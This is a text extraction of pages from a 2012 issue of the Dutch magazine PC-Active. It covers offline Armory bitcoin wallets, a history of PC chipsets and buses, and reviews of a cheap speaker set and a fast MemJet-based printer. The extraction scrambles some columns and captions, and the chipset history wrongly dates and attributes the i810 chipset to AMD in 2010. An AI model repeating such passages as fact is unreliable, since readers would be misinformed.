deze offline computer creëert u een versleutelde wallet in Armory, zodat diefstal van deze netbook u niet in de problemen brengt. Daarna maakt u een back-up van deze wallet, digitaal of op papier - Armory drukt dan een papier af met alle benodigde sleutelinformatie voor deze wallet! - en u bergt deze op een veilige plaats op, bijvoorbeeld in een kluis. In de eigenschappen van die portemonnee maakt u nu, nog altijd op de offline computer, een watchingonly copy aan van de wallet en kopieert u deze naar een USB-stick. Steek deze gegevensdrager nu in de online computer en importeer deze wallet in Armory. In de eigenschappen van de geïmporteerde wallet klikt u nu op het Belong to-veld en vinkt u This wallet is mine aan. Op beide computers krijgt u nu identieke adressen te zien. Op uw online computer kunt u nieuwe adressen genereren en aan andere gebruikers geven, die u zo bitcoins kunnen overmaken. Als uw online computer gecompromitteerd is, kan de dief echter niet bij uw schat, want de wallet op deze pc is een watching-only kopie die de geheime sleutel niet bevat. De dief weet dan wel welke adressen van u zijn, maar kan er niets mee doen. Wilt u uw bitcoins uitgeven, creëer dan op de online computer een unsigned transaction, kopieer deze naar de USB-stick en steek die in de offline computer. Onderteken deze transactie op de offline computer en kopieer de ondertekende transactie naar de USB-stick, waarna u deze in de online computer steekt. Laad de
transactie in Armory in, dat de ondertekende transactie uiteindelijk naar het Bitcoin-netwerk broadcast, waar het zoals elke andere Bitcoin-transactie wordt verwerkt. De transactiegegevens op de USB-stick zijn overigens niet geheim; het kan dus geen kwaad als u bijvoorbeeld een geleende gegevensdrager gebruikt en de bestanden daarna vergeet te wissen. Dit alles klinkt misschien wat omslachtig, maar met wat oefening hoeft deze manier van met bitcoins omgaan helemaal niet lang te duren en het is heel veilig. Ook met de client Electrum kunt u offline transacties uitvoeren [10], evenals met de webgebaseerde dienst My Wallet van Blockchain.info [11].
Nog veiliger U kent nu enkele algemene voorzorgsmaatregelen om veilig met bitcoins om te gaan, maar volgende maand gaan we nog meer hardcore. We bespreken dan het omzetten van bitcoins in fysieke voorstellingen en hoe u geheime sleutels terug importeert. Bovendien tonen we u hoe u uw geheime bitcoin-sleutel uit uw hoofd kunt leren, zodat u helemaal geen fysiek spoor van uw digitale geld achterlaat...
INFOLINK 262003
Voor de voetnoten bij dit artikel: http://www.pc-active.nl/262003
PC-ACTIVE | Nr. 262 – 2012
Denkwerk.indd 53
53
9/6/12 10:45 AM
DEEL 1: DE ONTWIKKELING
GESCHIEDENIS VAN DE CHIPSET TEKST : HANS NIEPOTH
Een nieuwe processor krijgt vaak alle aandacht, maar ook de prestaties van de chipset mogen we niet uitwissen. Als de CPU het brein van de computer is, dan vormt de chipset het hart. Het eerste deel uit een serie.
D
e chipset draagt zorg voor de communicatie tussen de processor en de rest van de computer - het geheugen, de slots, de poorten en de randapparatuur - en bepaalt met welke snelheid dat gebeurt. Vaak wordt de chipset ontworpen speciaal voor het gebruik met één bepaalde processor en wordt een geheel nieuwe architectuur op de moederborden geïntroduceerd. Tussendoor worden er vaak nog kleine aanpassingen gedaan, zoals het verhogen van een bussnelheid of het aantal USB-poorten. Voor de laptops verschijnen er dan nog aparte versies. In de loop der tijd zijn er zo vele tien-
54
Chipsets.indd 54
tallen chipsets verschenen. De meeste vernieuwingen worden geïnitieerd door Intel. Andere fabrikanten blazen slechts een bescheiden partijtje mee.
Het begin Nog voor het geheel een naam had, bestond de chipset uit een aantal IC’s, geïntegreerde circuits oftewel chips. Op IBM’s XT (1983-1987) waren dit onder meer een Direct Memory Access- of DMA-controller, een interruptcontroller, een cachecontroller, een buscontroller, een klokgenerator en een peripheral controller. Maar in 1986 kwam Chips and Technologies met de
PC-ACTIVE | Nr. 262 – 2012
9/6/12 12:15 PM
Chipsets
82C206-chip, die verschillende ondersteunende chips samenvoegde tot één onderdeel. Samen met de buffer- en geheugencontrollerchips telde de chipset toen nog maar vijf chips en niet veel later werden ook alle geheugencontrollerchips samengevoegd in de 82C836 Single Chip AT. Ook andere bedrijven, zoals OPTi, Silicon Integrated Systems (SiS) en Acer Labs (ALi), kregen licenties om chips voor de Intel-processors te maken, maar het kostte toen nog twee jaar voordat er een passende chipset voor de 80286-processor klaar was en de bijbehorende moederborden konden verschijnen. Voor de i386 was die periode teruggebracht tot een jaar, maar de afhankelijkheid van derden was Intel een doorn in het oog en het bedrijf besloot zelf chipsets te ontwikkelen. De eerste eigen Intel-chipset, de Saturn 420TX voor de i486, kwam eind 1992 op de markt. Met het verschijnen van de eerste Pentium-processor kwam Intel niet alleen met de 430-chipsetserie uit, maar ook meteen met een eerste eigen moederbord. De toen gevestigde chipsetfabrikanten waren uiteraard niet blij. In de jaren hierna zagen VLSI, SiS en ALi hun marktaandeel steeds verder slinken en gooiden ze uiteindelijk de handdoek in de ring.
Bussen Een verhaal over chipsets is een verhaal over bussen, flessenhalzen en kloksnelheden. Het succes van de eerste IBM-pc was mede te danken aan de insteekgleuven, waarmee het systeem was uit te breiden. De allereerste systeembus was de Industry Standard Architecture-bus, die werd geïntroduceerd in 1981. Deze ISA-bus had een 8-bits datapad naar de uitbreidingskaarten en een snelheid van 4,77 MHz. De specificaties werden daarna opgetrokken tot 16-bits en 8 MHz, maar met de toenemende snelheid van de processors vormde de uitbreidingsbus steeds meer een knelpunt.
420TX Saturn chipset
| HARDWARE
De eerste 32-bits opvolgers, zoals de Micro Channel Architecture- of MCA-bus van IBM, de alternatieve Extended Industry Standard Architecture- of EISAbus van onder meer Compaq en de VESA Local Bus van de Video Electronics Standards Association werden geen succes - dure licenties, te complex en nog steeds te traag - totdat Intel uiteindelijk uitkwam met de Peripheral Component Interconnect- of PCI-bus.
De geschiedenis van de chipset komt ten einde Behalve een hogere snelheid bood die verschillende voordelen, zoals plug-and-play en busmastering in plaats van DMA-kanalen, waarmee uitbreidingskaarten direct toegang tot het werkgeheugen kregen. De PCI-bus had bij het uitkomen in 1992 een breedte van 32-bits en een snelheid van 33 MHz. Met de PCI 2.1-specificatie in 1995 werd de snelheid verdubbeld tot 66 MHz en kwam de bandbreedte uit op 266 MB/s. Voor de toenemende eisen van de randapparaten en met name de vraag naar bandbreedte van de grafische kaart was dit echter niet genoeg. In 1997 introduceerde Intel daarom de Accelerated Graphics Port. In tegenstelling tot de gedeelde PCIbus was de AGP-bus een ontwerp speciaal voor video. Deze had aanvankelijk een bandbreedte van 266 MB/s, maar deze werd via double (AGP 2x), quad (AGP 4x) en octuple pumping (AGP 8x) technieken opgevoerd tot 2,11 GB/s. Op zijn beurt werd AGP weer ingehaald door PCI Express.
North- en southbridge De 420TX voor een i486-processor telde nog drie chips en de 430TX Triton voor de Pentium kon het in 1997 met twee chips af: de northbridge en de southbridge.
PCI-slots
PC-ACTIVE | Nr. 262 – 2012
Chipsets.indd 55
55
9/6/12 12:16 PM
HARDWARE
| Chipsets
Architectuur van northbridge en southbridge
56
Chipsets.indd 56
Architectuur van MCH-ICH
Samen controleerden deze twee bijna alles wat op het moederbord was aangesloten en dat zou lang zo blijven. De northbridge regelde het snelle verkeer tussen de processor, het geheugen en de grafische kaart. Ook het type geheugen en de geheugenomvang die kon worden geadresseerd, werden bepaald door de northbridge. De southbridge zorgde op zijn beurt voor de communicatie met de relatief tragere componenten van de pc: het toetsenbord, de muis, de drives en USB-apparaten, maar ook de op PCI-slots aangesloten apparaten. Ook de fabrikanten van de alternatieve chipsets, bijvoorbeeld VIA en SiS, zouden de northbridgesouthbridge architectuur lang volgen. In de SiS 630 en 730 werden weliswaar beide architecturen samengevoegd, maar feitelijk waren dit twee chips in één package. nVidia lukte het wel beide te integreren, in de nForce3 en 4, maar dat was niet meer zo lastig, doordat de geheugencontroller toen al bij de Athlon 64 was ingetrokken.
ted Hub Architecture werden de CPU, northbridge en southbridge verbonden door de 8-bits Interlink bus op 133 MHz Double Data Rate, wat neerkwam op een bandbreedte van 266 MB/s. Intel noemde de northbridge sindsdien de Memory Controller Hub (MCH) en de southbridge de I/O Controller Hub (ICH), maar de termen vonden weinig ingang. ISAslots waren nog optioneel mogelijk, maar op de meeste moederborden werd ermee afgerekend. De PCI-bus was nog wel aangesloten op de southbridge, maar had geen functie meer bij de communicatie tussen de verschillende controllers. De 900-serie kenmerkt zich door de ondersteuning van Double Data Rate 2 en de introductie van de PCIExpress bus. Het lot van de AGP- en ook de PCI-bus was daarmee bezegeld. Vanuit de Chipset Graphics and Memory Controller Hub (GMCH) northbridge met grafische processor kon een x16 PCI-Express slot worden aangestuurd voor grafische kaarten, vanuit de ICH nog eens zes x1 PCI-Express slots.
MCH en ICH
Core-i chipsets
In 2010 kwam de volgende vernieuwing met de 800-serie chipsets van AMD. Niet alleen had de i810 northbridge een geïntegreerde grafische chip, belangrijker nog was dat de PCI-bus niet meer de ruggengraat van het systeem vormde. In plaats daarvan kwam de Accelerated Hub Architecture. In de oude situatie verliep alle communicatie door de relatief langzame PCI-bus. Zo ging datatransport tussen de harddisk en het RAM-geheugen in deze situatie via southbridge en northbridge geheel door de PCI-bus. In de Accelera-
Sinds 2005 volgt Intel de tick-tock strategie, waarmee het bedrijf beoogt om ieder jaar ofwel een nieuwe processorarchitectuur te introduceren - een tock - ofwel een nieuw etsprocedé waarbij het aantal nanometers verder afneemt - een tick. 2008 was een tock-jaar, waarin de Nehalem-architectuur werd geïntroduceerd en dat had belangrijke gevolgen voor de chipset. De opvallendste verandering was de verplaatsing van de geheugencontroller van de northbridge naar de processor, iets wat AMD overigens al vele jaren daarvoor had gedaan. Met de integratie van de geheu-
PC-ACTIVE | Nr. 262 – 2012
9/6/12 4:41 PM
Chipsets
gencontroller op de CPU konden de Core-i processors voortaan rechtstreeks met het geheugen communiceren. Daarnaast verhuisde ook de PCI-Express x16 bus voor de grafische kaarten naar de CPU. Ook de video hoefde daarmee niet meer langs de frontside bus voor de communicatie met de processor. De northbridge was hiermee zijn taken kwijt en verdween van de Intel-moederborden. De southbridge ging verder als Platform Controller Hub door het leven, met de processor verbonden door een Direct Media Interface-link.
PCI-Express Peripheral Component Interconnect Express is een uitbreidingbus die de oudere PCI-, PCI-X- en AGPbussen vervangt. De voordelen zijn talrijk: PCI-E heeft kleinere connectoren, een lagere pincount en hot-plug functionaliteit. Het voornaamste verschil met de oude PCI-bus is dat PCI-E is gebaseerd op een point-to-point topologie met aparte seriële links, terwijl de eerste een parallelle bus was waarin adres-, data- en controlelijnen werden gedeeld en de traagste kaart de snelheid bepaalde. PCI-E verstuurt pakketjes over point-to-point links. Een PCI-E slot kan beschikken over één, twee, vier, acht of zestien lanes ofwel rijstroken. Een enkele lane bestaat uit vier signaallijnen waarover in twee richtingen (full duplex) 8-bits pakketjes worden verstuurd. In de eerste versie had elke lane een data transfer rate van 2,5 GT/s (gigatransfers per seconde) en een bandbreedte van 250 MB/s in beide richtingen. Een PCI-E 1.0 x8 verbinding heeft dus een bandbreedte van 2 GB/s en een PCI-E 1.0 x16 verbinding een bandbreedte van 4 GB/s voor gelijktijdige upload en download. Voor de data-integriteit wordt daarbij een 8b/10b encoding schema gebruikt, waarbij steeds acht bits in een 10-bits character worden verpakt. Een PCI-E link heeft dus een overhead van twintig procent.
PCI Express 2.0 en 3.0 PCI-Express 1.0 was een nieuw concept dat alle parallelle bussen in de schaduw stelde. Met de toenemende vraag naar bandbreedte liep ook PCI-E 1.0 op een gegeven moment tegen zijn grenzen. De eerste standaard uit 2004 werd in 2008 opgevolgd door PCIExpress 2.0 en geïntroduceerd in de X38-chipset. Met PCI-E 2.0 wordt de datatransfer rate verdubbeld van 2,5 GT/s naar 5,0 GT/s en daarmee ook alle bandbreedtes. Een PCI-E kaart met één lane (×1) heeft nu een maximale bandbreedte van 500 MB/s, een 8-lanes (×8) kaart haalt 4 GB/s en een ×16 kaart dus 8 GB/s. PCI-Express 2.0 voorziet ook in - vooral voor laptops welkome - stroombesparende mogelijkheden en kan een aantal lanes van het totaal uitschakelen als daar tijdelijk geen behoefte aan is. PCI-Express 3.0 verschijnt dit jaar op de moederborden. Hierbij wordt de transfer rate verder verhoogd naar 8 GT/s, waarbij tegelijk het encoding-schema
| HARDWARE
wordt gewijzigd in 128b/130b, waardoor de overhead nog slechts 1,5 procent bedraagt. Effectief leidt dit tot een volgende verdubbeling van de bandbreedte tot 1 GB/s per lane.
Direct Media Interface De Direct Media Interface volgde de Hub Interface op als link tussen de northbridge en southbridge, te beginnen in de 9xx-chipsets waar de DMI de northbridge verbond met de ICH6 southbridge. DMI lijkt sterk op PCI-Express met het gebruik van multiple lanes en differential signalling om een point-topoint link te maken. De link was aanvankelijk - in de i915- en i925-chipsets - een half-duplex x2-link waarbij hetzelfde datapad afwisselend werd gebruikt voor zenden en ontvangen. In latere chipsets werd de DMI-interface doorgevoerd met gescheiden paden voor zenden en ontvangen (full-duplex) en werd de bandbreedte 10 Gbps. Met DMI 2.0 werd in 2011 de bandbreedte over een x4-link verdubbeld tot 20 Gbps ofwel 2 GB/s. Aan deze architectuur wordt ook vandaag de dag nog vastgehouden.
Flexible Display Interface De Flexible Display Interface (FDI) is een door Intel ontworpen link om de in de processor geïntegreerde grafische processor, via de Platform Controller Hub, te verbinden met de display connectors op het moederbord. Ondersteunde videoformaten zijn DVI, HDMI 1.4 en DisplayPort 1.1 met een maximale resolutie van 2560 bij 1600. De FDI-link loopt op de moederborden tussen de Core-i processors - zoals de Sandy Bridge en de H-serie chipsets. Chipsets die de geïntegreerde HD Graphics grafische processor niet gebruiken, zoals de P-serie, gebruiken ook de FDI-link niet.
BIOS Ook het BIOS, basic input/output system, zouden we als deel van de chipset kunnen beschouwen. De ingebouwde BIOS-code wordt als eerste uitgevoerd als u de pc aanzet en heeft als taak alle aangesloten hardware, zoals toetsenbord, geheugen, videokaart en harddisk, te identificeren en te initialiseren. Daarna lokaliseert het BIOS de bootloader-software op de
PCI-Express slots
PC-ACTIVE | Nr. 262 – 2012
Chipsets.indd 57
57
9/6/12 12:16 PM
HARDWARE
| Chipsets
Architectuur van northbridge en southbridge
harddisk of cd/dvd - het boot-device - en voert het deze uit, waarop de controle wordt overgegeven aan het besturingssysteem. Het BIOS bevindt zich in een flash ROM-chip, waarvan de inhoud bewaard blijft. Het BIOS heeft een gebruikersinterface, een menusysteem waarin een deel van de hardware is te configureren. Door bij het opstarten de Delete-knop ingedrukt te houden komt u in de regel in het BIOSconfiguratiemenu. Wat u precies kunt instellen, verschilt sterk van systeem tot systeem. De klok, de datum en de bootdevices zitten er altijd bij, maar op veel moederborden zijn ook de snelheid van de front-side bus, geheugenlatency’s en -de voltages aan te passen. Er bestaat echter niet zoiets als een BIOS-standaard. Elke fabrikant voegt code toe om met de nieuwste hardware te kunnen werken, maar doet in feite maar wat. Bovendien moet die code worden geschreven in machinetaal en dat beheerst bijna niemand meer. Het BIOS is ongetwijfeld het meest ‘legacy’ onderdeel dat zich nog in een moderne pc bevindt, maar de vervanger staat al klaar: Extensible Firmware Interface of EFI. De vernieuwing komt zoals gebruikelijk van Intel en is inmiddels uitgebreid tot Unified EFI, UEFI, waaraan ook AMD, AMI en Phoenix/Award deelnemen. De BIOS-vervanger moet platform- en systeemonafhankelijk worden en ook in een hogere programmeertaal zoals CC+ zijn te specificeren. Intelmoederborden zijn er al mee uitgerust. De Aziatische fabrikanten lijken de kat nog even uit de boom te kijken.
Steeds minder fabrikanten Alle chipsetfabrikanten zonder eigen processor hebben het bijltje erbij neergelegd. VIA maakte van 1997 tot 2006 de Apollo en de P4-chipsets voor bijna alle Pentiums, en voor AMD’s Athlons had VIA de KT-
58
Chipsets.indd 58
serie. De laatste nog door de fabrikant ontwikkelde chipset was de P4M900 voor de Core Duo en in 2008 besloot VIA zich te richten op de ontwikkeling van de eigen Nano-processor. SiS was in de vorige eeuw succesvol met chipsets voor de 80486-processor en de eerste Pentiums. Ook voor AMD’s Athlon ontwierp SiS verschillende chipsets, maar na een laatste model voor de Pentium D en de Athlon 64 zag ook SiS geen heil meer in de chipsetontwikkeling en het bedrijf richt zich nu op consumentenelektronica. ALi werd bekend met de Aladdin-chipsets voor de Pentium en de ALiMagik-chipsets voor de AMD K7-processor, totdat het bedrijf in 2003 werd overgenomen door nVidia. Die fabrikant maakte de nForcechipsets jarenlang voor zowel Intel als AMD, maar kreeg geen licentie meer voor de Intel-chipsets met een DMI-bus - dat wil zeggen voor alle Core-i processors - waarna de ontwikkeling van de nForce-chipsets voor Intel en ook voor AMD werd gestaakt. ATI, vooral bekend van de videokaarten, maakte in het vorige decennium de Radeon Xpress-chipsets voor AMD’s Athlon, totdat het in 2006 door AMD zelf werd overgenomen. Momenteel is Intel heer en meester op de chipsetmarkt.
Geen lang leven meer? De trend in processorontwerp is om steeds meer functies te integreren in één chip. Een steeds verdere integratie van de verschillende componenten is uit het oogpunt van energiebeheer, snelheid en kosten een goede ontwikkeling voor de consument en voor de fabrikanten van moederborden wordt het er ook eenvoudiger op. Keerzijde van de ontwikkeling is dat er minder keuze is. AMD verplaatste met de Athlon64 de geheugencontroller al naar de CPU. Intel volgde met de Nehalem-processors. Met de Sandy Bridge verhuisden ook de grafische controller en grafische processor naar de CPU. Ook in de AMD Fusion-processors zijn nu alle northbridge-functies inclusief een grafische processor in de CPU-chip opgenomen. Trekken we de ontwikkeling verder door, dan verdwijnt de chipset geheel van de moederborden. Ivy Bridge - een tick naar 22 nanometer - moet de basis leggen voor een nieuwe architectuur waaruit ook de southbridge is verdwenen. In de voor 2014 geplande Haswell zouden alle functies met de processor worden geïntegreerd in één package met de naam MCM, Multi-Chip Module. Om te beginnen met dual-core CPU’s voor notebooks, met de volgende Broadwell tock (14 nanometer) is er ook plaats voor 6- en 8-cores. AMD’s verdere plannen met de Fusion-processor zijn nog niet bekend, maar zoals het er nu uitziet komt de chipsetgeschiedenis over niet al te lange tijd ten einde. Voor het zover is, zullen we in een volgend artikel eerst de meest recente chipsets en ontwikkelingen onder de loep nemen.
PC-ACTIVE | Nr. 262 – 2012
9/6/12 12:16 PM
LEUK OF MEUK?
SANDBERG SPEAKER SET TEKST : WAMMES WITKOP
“Consumenten profiteren van de prijzenslag rondom luidsprekers,” aldus het persbericht. En € 21,99 voor een set met houten baskastje is inderdaad niet duur. Maar zou het wat kunnen wezen?
D
e nieuwsgierigheid was gewekt, dus al snel stond er een doosje op de testbank, waaruit een basspeakertje van 20 bij 20 bij 14 centimeter verscheen, alsmede twee plastic stereoluidsprekertjes van 12 bij 9 bij 8 centimeter, met een vast snoer waarmee ze maximaal een meter van de boombox kunnen worden geplaatst. Die boombox is inderdaad niet van plastic, maar van een lichte kwaliteit MDF. Het apparaat weegt slechts 1,1 kilogram, compleet met netstekker en ingebouwde netvoeding. Het basluidsprekertje heeft een diameter van tien centimeter, de beide andere boxjes moeten het stellen met nog geen zes centimeter speakers die per stuk 3 watt RMS in huis hebben. De bas levert 6 watt RMS en dat alles bij een rendement van 83 dB. De fabrikant claimt een freqentiekarakteristiek van 60 Hz tot 20 KHz, maar zonder daarbij te specificeren binnen hoeveel dB deze valt. Aan de voorkant van de basspeaker zit naast een kek blauw led’je een volumeregelaar, achterop vinden we de aan/uit-schakelaar, een volumeknop voor alleen de bas en de uitgang om de andere boxjes aan te sluiten. Ook de speaker is achterop gemonteerd, zonder speakerdoek of grill, zodat de conus zichtbaar is. En zo is hij dus ook kwetsbaar; per slot van rekening is het slechts licht karton waar zo’n speaker van wordt gemaakt. Aan de voorzijde vinden we nog een basreflexpoort, een ronde buis die zo’n zeven centimeter in het inwendige steekt. Deze techniek haalt wat lagere tonen uit de eigenlijk wel wat kleine luidspreker en erg kleine kast.
Signaalgenerator De luistertest viel niet tegen. Voor de prijs, althans. Het geluid was wel ietwat blikkerig, maar zeker beter dan dat van veel van de goedkope plastic 2.1 speakersetjes die in de handel zijn. Het volume was niet overdreven, maar dat wilt u ook niet met dergelijke luidsprekers, die al snel overstuurd kunnen raken en dan niet meer om aan te horen zijn.
Om echt te kunnen beoordelen hoe deze speakertjes zich gedragen, is het overigens wel erg tijdrovend om gewoon naar muziek te luisteren. Veel sneller gaat het als we er met een signaalgenerator een sinustoon op zetten, een sweep waarbij de zuivere sinus in een seconde of twintig van 0 Hz tot 20 KHz loopt. Dan hoort u - binnen de grenzen van uw oren - welke toonhoogtes worden weergegeven en hoe zuiver ze klinken. Boembassen - frequenties waarbij de basreflexpoort of de kast zelf gaat resoneren vallen dan ook door de mand. Daarnaast kunt u met een goede microfoon ook nog eens objectief meten welke karakteristiek zo’n speakerset vertoont. En al die opties - en nog veel meer - zijn tegenwoordig softwarematig te realiseren, met bijvoorbeeld Visual Analyser 2011. Dat is een stuk gratis software dat voor audioliefhebbers erg de moeite waard is, maar wel een steile leercurve blijkt te hebben. Luisterend en metend bleek de claim van een ondergrens van 60 Hz wel te kloppen. Maar er waren wel wat boembassen te vinden, die in de muziek nog niet opgevallen waren. Alleen die 20 KHz werd absoluut niet gehaald; zo rond de 17.500 Hz viel het geluid toch weg. Overigens geen slechte score, maar de claim op de verpakking bleek overdreven.
Conclusie Leuk! Geen hifi, verre van dat, maar wie een 2.1 luidsprekersetje zoekt voor een lage prijs zonder meteen heel erg plastic te klinken, heeft hier een goede aan. De ingebouwde voeding is handig, de vormgeving geinig. De kabeltjes zijn wat aan de korte kant, maar wie heeft er geen audioverlengsnoertjes slingeren?
Play Speaker Set 2.1 Prijs: € 21,99 http://www.sandberg.it/nl-nl/product/ Play-Speaker-Set-2.1-EU
PC-ACTIVE | Nr. 262 – 2012
Leuk of meuk.indd 59
59
9/6/12 10:52 AM
Lomond EvoJet Office
Printende douchekop! tekst : wammes witkop
Een Russische inkjet die zestig pagina’s per minuut print? In kleur? Dat willen we graag zelf zien! Want wie weet, dit technisch foefje zou wel eens de toekomst kunnen zijn…
I
nktpatronen van vijftig milliliter zien we niet zo vaak. En dan te bedenken dat de zwarte cartridge zelfs nog twee keer zo groot is! Maar wat deze printer echt anders maakt, is de printkop. Waar alle andere inkjetprinters, zelfs de echte grootformaatprinters die tot A0 aankunnen, met heen en weer bewegende printkoppen werken, volstaat deze met een vaste kop - maar dan wel eentje die net even breder is dan een A4’tje! Dat schiet dan wel op met het afdrukken, als de kop niet heen en weer hoeft te gaan maar in één keer, als een soort regendouche, de hele breedte van het vel papier aflopend kan bedrukken. Alleen dat papier beweegt nog. En ook dat gaat razend rap, want dit monster haalt inderdaad zestig pagina’s per minuut. Anders gezegd: in die ene minuut wordt er bijna achttien meter geprint - dat is zo’n kilometer papier per uur. Een kleine drukpers, als het ware.
voorraad. Die zee aan inkt kost maar liefst € 140,42 euro - maar is wel goed voor dik zevenduizend afdrukken, zodat de inkt per pagina A4 met gewone tekst op de 5% bedekking die daarvoor als maat geldt, slechts 0,0195 cent kost. Dat is opvallend goedkoop. Alleen gooit de printkop dan wel weer wat roet in het eten, want ook die heeft een beperkte levensduur: na vijftigduizend afdrukken zou deze vervangen moeten worden. Dat ding is knap duur, zo’n 189 euro, zodat de uiteindelijke paginaprijs voor tekst op zo’n 0,0233 cent neerkomt. Nog altijd ronduit goedkoop, vergeleken met ‘gewone’ inkjets of zelfs laserprinters. En er wordt gewerkt aan een service waarmee de cartridges tot twintig keer hervuld kunnen worden, hetgeen de inktprijzen nogmaals met zo’n veertig procent zou moeten drukken!
Bakbeest
Tenzij u er plezier in zou hebben om het verenigingsblad voortaan zelf te drukken, is deze printer niet voor thuis bedoeld. Ook de aanschafprijs is nu nog te hoog voor thuisgebruik: over de duizend euro, inclusief de BTW. Dus is de conclusie gerechtvaardigd dat deze printtechniek nu nog duidelijk voor de kantooromgeving is bestemd. Maar daar komt zo’n snelheidsmonster dan ook wel meteen tot zijn recht. Maar de ervaring leert dat dergelijke apparaten alleen maar goedkoper worden, ’t is een kwestie van afwachten.
Aan dit apparaat is zowat alles groot. Het begon al met de loodzware doos waarin de printer uitermate veilig verscheept werd, waaruit een twaalf kilo zware machine van 42 centimeter breed bij 55 centimeter diep en 22,5 centimeter hoog verscheen. Ook de losse baksteen van een voeding mag er zijn, jammer genoeg. We zien toch liever ingebouwde netvoedingen. De superlatieven gaan gewoon door: de inktpatronen bevatten 50 milliliter per stuk. Behalve de zwarte inkt dan: die is dubbel zo groot en heeft 100 milliliter op
60
Kantoor
PC-ACTIVE | Nr. 262 – 2012
Russische printer.indd 60
9/6/12 4:24 PM
LOMOND EVOJET OFFICE
| HARDWARE
De fabrikant van deze printtechniek, MemJet, maakt niet alleen de brede printkop, maar ook de bijbehorende controllerchips en natuurlijk de driversoftware waarmee de printdata vanaf de computer worden verzonden. MemJet is ongetwijfeld op de hoogte van deze potentiële problemen als het gaat om het te trage dataverkeer. Dus hebben ze compressie toegepast, voor dat dataverkeer. Blijkbaar probeert de driver te gokken hoeveel een afdrukstroom gecomprimeerd
Figuur 1: Liggend fruit op EvoJet Office - Lomond Photopaper for Office 85 grams
Snelheid De fabrikant claimt een pagina A4 per seconde, ook in kleur, zelfs als kleurenfoto. En dat klopt, als het maar veel afdrukken van dezelfde foto zijn, in de standaardkwaliteit: 1200 bij 600 DPI. Wie ook in de lengterichting voor 1200 DPI kiest, print meteen twee keer zo langzaam. Maar bij een experiment met een honderd kleurenfoto’s op A4 in de hoogste kwaliteit bleken er gemiddeld ‘slechts’ vijf per minuut te worden afgedrukt. Nog steeds heel rap, maar wel een factor 12 langzamer dan die claim! Wie even peinst, denkt te snappen waarom: zo’n A4-pagina op 1200 bij 1200 pixels per inch levert 417.630.355 bytes aan data op. USB 2.0 haalt zo’n 35 MB/s, dus in twaalf seconden inderdaad 420 MB. Een snel experiment met tien keer dezelfde foto op standaardkwaliteit haalde wel de geclaimde snelheid, toen de data eenmaal in de printer waren ontvangen: één per seconde. Wie hoopt dat de netwerkkabel uitkomst zou bieden, de EvoJet kent een slechts 100 Mbit/s netwerk, oftewel 12,5 MB/s. Dat gaat nog eens drie keer trager worden…
Figuur 2: Liggend fruit op EvoJet Office - Lomond Premium Photo Paper Super Glossy 195 grams
Compressie Echter, bij verder experimenteren bleek deze verklaring nergens op gestoeld te zijn: in een reeks van zo’n vijftig printopdrachten die in de queue waren bewaard - kwestie van printer offline houden - schommelde de afmeting van de fotobestanden zo tussen de drie en acht MB.
Figuur 3: Liggend fruit op HP Photosmart 7510 - HP Premium Glossy Plus 280 grams
PC-ACTIVE | Nr. 262 – 2012
Russische printer.indd 61
61
9/6/12 4:25 PM
HARDWARE
| Lomond EvoJet Office
De printkop
mag worden. Daar liepen we ook keihard tegen op, bij een zeer donkere foto van een zonsondergang: de compressiefouten kwamen opeens uiterst storend op de afdruk naar voren. Die driver mag nog wel eens opnieuw getuned worden, wat ons betreft. Nog liever zagen we een optie om zelf te kiezen of de compressie wel of niet gebruikt mag worden en hoe sterk dan wel. Waarom A4-foto’s niet sneller willen afdrukken dan die vijf per minuut - nog altijd zeer rap - hebben we niet kunnen achterhalen. Waarschijnlijk ligt het aan de firmware van deze printer die toch wel heel erg op kantoortoepassingen is gericht en dan veel simpeler documenten verwerkt. Overigens, die inderdaad wel degelijk haalbare snelheid van één pagina A4 per seconde heeft ook zo zijn gevolgen voor de gebruikte inkt: die moet in die ene seconde droog genoeg zijn om niet meer te vlekken. En dat lukt, hoewel bij een grotere printjob de damp er zowat vanaf sloeg!
Kleurkwaliteit Een goede kleurenafdruk is een lastige opgaaf. Printer, inkt en papier moeten exact op elkaar afgestemd zijn om tot een realistische weergave te komen. Om dat te bereiken heb je kleurprofielen nodig, in principe voor elke mogelijke combinatie van papier en printer. Dat kleurprofiel regelt de details, als het gaat om het ragfijne samenspel tussen printer en papier. Jammer genoeg bleek bij navraag door de Nederlandse importeur fabrikant Lomond niet in staat zo’n ICC-profiel te leveren voor haar eigen fotopapier. We moesten het doen met de beperkte profielen in de driver. Dat leverde toch kleurzwemen
Kleur
Prijs
Aantal pagina’s ISO/IEC 24711
Kosten per pagina z/w
op. Figuur 1 toont ons fruitig voorbeeld afgedrukt op standaard Lomond-papier, waarbij vooral het rood er bekaaid vanaf komt. Maar goed, we hadden ook Lomond-fotopapier - en de instelling daarvoor in de driver. Figuur 2 oogt al stukken beter en zonder vergelijkingsmateriaal zou je hier toch tevreden mee kunnen zijn. Tot je Figuur 3 eens beziet, gemaakt op een HP-printer. De sinaasappel is nu echt oranje, de meloen oogt sappiger, het geheel stukken natuurlijker. Jammer, dat Lomond die ICC-profielen niet kan of wil leveren. Op de Russische websites staan vele profielen voor Lomond-papier voor andere merken printers, dus blijkbaar ziet Lomond de EvoJet Office inderdaad vooral als kantoorprinter. De EvoJet kan in standaard en beste kwaliteit afdrukken, in het eerste geval wordt de verticale resolutie gehalveerd. Vreemd genoeg blijkt gewone tekst in best quality erg lelijk uit te pakken, de letters lopen wat dicht. Bij fotografie is het juist andersom, op 1200 DPI is de kleurverzadiging nog net iets fraaier. En over kwaliteit gesproken: ook een tweepuntslettertje uit Word bleek goed leesbaar. Met een sterke bril, dat dan weer wel…
Kosten Het uitzoeken van de kosten van afdrukken is altijd weer een feest: je moet gewoon heel erg veel afdrukken maken en tellen hoe lang het duurt voor de cartridges leeg zijn. Eerlijk gezegd is ons dat deze keer slechts met de gele inkt gelukt, het werd knap tijdrovend! In Tabel 1 hebben we de inkt- en printkopkosten op een rij gezet, voor zwart-wit, kleurendocumenten en A4-kleurenfoto’s. De opbrengsten per cartridge
Kosten per pagina kleur
Aantal pagina’s kleurenfoto
Kosten per pagina kleurenfoto
Cyaan
€ 70,21
6239
€ 0,0113
2000
€ 0,0351
Magenta
€ 70,21
6239
€ 0,0113
1000
€ 0,0702
Yellow
€ 70,21
6239
Black
€ 140,42
7191
€ 189,21
50000
Inktkosten Printkop Totaal
€ 0,0113
1000
€ 0,0702
€ 0,0195
€ 0,0195
2000
€ 0,0702
€ 0,0195
€ 0,0533
€ 0,2457
€ 0,0038
€ 0,0038
€ 0,0038
€ 0,0233
€ 0,0571
€ 0,2495
Tabel 1: Inkt- en printkopkosten
62
